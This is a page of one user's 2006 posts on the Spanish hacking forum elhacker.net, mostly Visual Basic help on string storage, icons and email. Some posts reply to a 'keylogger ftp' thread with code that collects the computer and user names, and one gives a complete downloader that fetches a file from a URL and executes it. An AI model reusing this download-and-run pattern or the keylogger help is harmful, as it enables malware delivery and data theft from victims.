elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ... 63
321  Programación / Programación Visual Basic / Re: Lista de strings en: 13 Febrero 2006, 16:25 pm
Mas facil si cabe:

¿A que archivo es mas rapido aceder, a un archivo de texto o a una base de datos?

PD: ¿Donde estara nuestro Slasher? k el foro se ta descontrolando...

Salu2
322  Programación / Programación Visual Basic / Re: keylogger ftp :D en: 12 Febrero 2006, 16:59 pm
Usa apis
Fuente Api-Guide:

Nombre de el ordenador:
Citar
Private Const MAX_COMPUTERNAME_LENGTH As Long = 31
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
Private Sub Form_Load()
    Dim dwLen As Long
    Dim strString As String
    'Create a buffer
    dwLen = MAX_COMPUTERNAME_LENGTH + 1
    strString = String(dwLen, "X")
    'Get the computer name
    GetComputerName strString, dwLen
    'get only the actual data
    strString = Left(strString, dwLen)
    'Show the computer name
    MsgBox strString
End Sub


Nombre de el usuario:
Citar
Private Enum EXTENDED_NAME_FORMAT
    NameUnknown = 0
    NameFullyQualifiedDN = 1
    NameSamCompatible = 2
    NameDisplay = 3
    NameUniqueId = 6
    NameCanonical = 7
    NameUserPrincipal = 8
    NameCanonicalEx = 9
    NameServicePrincipal = 10
End Enum
Private Declare Function GetUserNameEx Lib "secur32.dll" Alias "GetUserNameExA" (ByVal NameFormat As EXTENDED_NAME_FORMAT, ByVal lpNameBuffer As String, ByRef nSize As Long) As Long
Private Sub Form_Load()
    'KPD-Team 2001
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@allapi.net
    Dim sBuffer As String, Ret As Long
    sBuffer = String(256, 0)
    Ret = Len(sBuffer)
    If GetUserNameEx(NameSamCompatible, sBuffer, Ret) <> 0 Then
        MsgBox "Username: " + Left$(sBuffer, Ret)
    Else
        MsgBox "Error while retrieving the username"
    End If
End Sub

Salu2
323  Programación / Programación Visual Basic / Re: Ayuda con programa en vb en: 12 Febrero 2006, 16:55 pm
http://foro.elhacker.net/index.php/topic,108601.0.html

Salu2
324  Programación / Programación Visual Basic / Re: Lista de strings en: 11 Febrero 2006, 23:34 pm
Pero tamos en las mismas, 10000 frases en memoria ocupan un webo, kero k se guarden en un archivo o algo, pero kero k me digais lo k seria mejor.

Salu2
325  Programación / Programación Visual Basic / Lista de strings en: 11 Febrero 2006, 15:23 pm
A ver si me se explicar, el caso es que estoy acabando un programa k va añadiendo a un listbox una serie de frases, pero son muchas y cuando son mas de 10000 en el listbox ocupa muchisima memoria.

El caso es k las tngo k tener todas en algun sitio porke en la lista no puede aber 2 iguales (cada vez k añado una tengo k compararla con todas las de la lista para ver si esta)

Para no tener ese problema a mi se me abia ocurrido guardarlas en un archivo de texto i ir lellendole por lineas o una base de datos, aconsegenme cual es mas rapido para poder leer los datos y guardarles.

Salu2
326  Programación / Programación Visual Basic / Re: Downloader!!!! en: 11 Febrero 2006, 14:45 pm
Citar
Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ShellExecuteA Lib "SHELL32.DLL" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Sub Form_Load()
On Error Resume Next
If DownloadFile Then
ShellExecuteA Me.hWnd, "Open", "C:\...", vbNullString, vbNullString, 1
DoEvents
End
End If
End Sub

Public Function DownloadFile() As Boolean
On Error Resume Next
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, "http://...", "C:\...", 0, 0)
If lngRetVal = 0 Then DownloadFile = True
End Function

Es de un webdownload k ice ace muxo tempo.

Salu2
327  Programación / Programación Visual Basic / Re: Establecer Icono (Imposible???) en: 11 Febrero 2006, 14:27 pm
http://foro.elhacker.net/index.php/topic,74603.0.html

Yo tambien estuve muy interesado en este tema y estuve buscandoinformacion sobre las apis:

BeginUpdateResource
UpdateResource
EndUpdateResource

Pero en vb no encontre casi nada y lo poko k encontre en frances.

Salu2
328  Programación / Programación Visual Basic / Re: Email en: 11 Febrero 2006, 14:19 pm
holas , weno enviar email es facil pero no es estable ni seguro, te recomiendo que uses ftp, es mas seguro y mas rapido, weno spero haber ayudado bye

El vocabulario correcto seria mandar el email desde un archivo en php o aps (no de el ftp)
El winsok es mucho mas rapido k mandarlo a traves de los servidores de hosting.
Es bastante estable y seguro, el unico impedimento son los filtros de spam.

Puedes usar el SocketMaster k son 2 modulos k te permiten usar el winsok sin depender de el.

salu2
329  Programación / Programación Visual Basic / Re: Botón (Button en Windows Form) en: 11 Febrero 2006, 14:05 pm
http://www.recursosvisualbasic.com.ar/htm/menu-principal/Ocx-dll.htm#9

Hay tienes unos cuantos controles para cambiar la apariencia de los botones.

Salu2
330  Programación / Programación Visual Basic / Re: keylogger ftp :D en: 11 Febrero 2006, 13:56 pm
Supongo k se refiere a cambiar un poko el diseño, hacerle un editor y cosas asi....

Pero no se si es eso.

Salu2
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ... 63
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines